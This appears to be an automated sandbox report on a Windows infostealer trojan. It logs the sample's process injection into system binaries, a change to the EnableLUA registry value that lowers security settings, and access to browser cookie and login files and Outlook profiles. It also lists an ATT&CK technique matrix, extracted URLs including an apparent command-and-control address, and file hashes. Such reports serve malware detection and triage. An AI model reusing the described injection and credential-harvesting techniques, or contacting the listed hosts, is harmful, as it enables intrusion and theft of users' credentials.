            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\System32\notepad.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe - Section loaded: NULL target: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe - Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe - Section loaded: NULL target: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe - Section loaded: NULL target: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe - Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe - Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe - Thread register set: target process: 7956
            Source: C:\Windows\SysWOW64\sfc.exe - Thread APC queued: target process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\System32\notepad.exe base: 400000
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\System32\notepad.exe base: 401000
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 4F36008
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exe - Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Shell_TrayWnd
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Progman
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Progmanlock
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Queries volume information: C:\Users\user\Desktop\NdYuOgHbM9.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
            Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 612 Process Injection | 21 Disable or Modify Tools | 1 OS Credential Dumping | 131 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 612 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            [Figure: Behavior graph. ID: 1438237, Sample: NdYuOgHbM9.exe, Startdate: 08/05/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            NdYuOgHbM9.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
            NdYuOgHbM9.exe | 40% | Virustotal | | Browse
            No Antivirus matches
            No Antivirus matches
                                                                    https://www.bookmyname.com/?wl=desfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.marksmile.com/asset/lp_qrcode.pngsfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shopsfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3A961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://parked.reg.bookmyname.com/images/lien_3.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.bookmyname.com/tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://parked.reg.bookmyname.com/images/lien_7.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://parked.reg.bookmyname.com/images/fr_on.gifsfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.insertcoen.com:80/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDjsfc.exe, 0000000C.00000002.4093679938.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000485A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://parked.reg.bookmyname.com/styles/styles-redir.csssfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://parked.reg.bookmyname.com/images/lien_6.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://upx.sf.netAmcache.hve.9.drfalse
                                                                                          high
                                                                                          https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpgsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://parked.reg.bookmyname.com/images/gb_off.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.ecosia.org/newtab/sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://parked.reg.bookmyname.com/images/lien_5.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.bookmyname.comsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.sedo.com/services/parking.php3sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://ac.ecosia.org/autocomplete?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://parked.reg.bookmyname.com/images/logo_book.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.bookmyname.com/?wl=frsfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.marksmile.com/asset/lp_style.csssfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://img.sedoparking.com/templates/images/hero_nc.svgsfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://parked.reg.bookmyname.com/images/lien_8.gifsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.lm2ue.ustyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4094582069.000000000580B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.bookmyname.com/whoisctc.cgi?wl=frsfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                    Analysis ID:1438237
                                                                                                                    Start date and time:2024-05-08 14:04:05 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 32s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:17
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:NdYuOgHbM9.exe
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@17/11@15/14
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 75%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 87%
                                                                                                                    • Number of executed functions: 79
                                                                                                                    • Number of non-executed functions: 245
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
14:04:53 | API Interceptor | 18x Sleep call for process: powershell.exe modified
14:05:08 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
14:05:49 | API Interceptor | 10529527x Sleep call for process: sfc.exe modified
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.165425106552101
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 16 streams, Wed May 8 12:04:53 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512114
                                                                                                                    Entropy (8bit):3.228805618738123
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8608
                                                                                                                    Entropy (8bit):3.710577774303289
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJlf/c6Y9iLxPNVgmfK76Jipr089baxsfJem:R6lXJNE6YSxPNVgmfci2aqfp
                                                                                                                    MD5:BE788CF859584FD6B8018707AD124928
                                                                                                                    SHA1:912F098C6FD1595E82CA44419058C85521B019F7
                                                                                                                    SHA-256:43977FA82E8DC70E13549916FD321AF7AF11CF67F3684E7F51AD964C4A7A607B
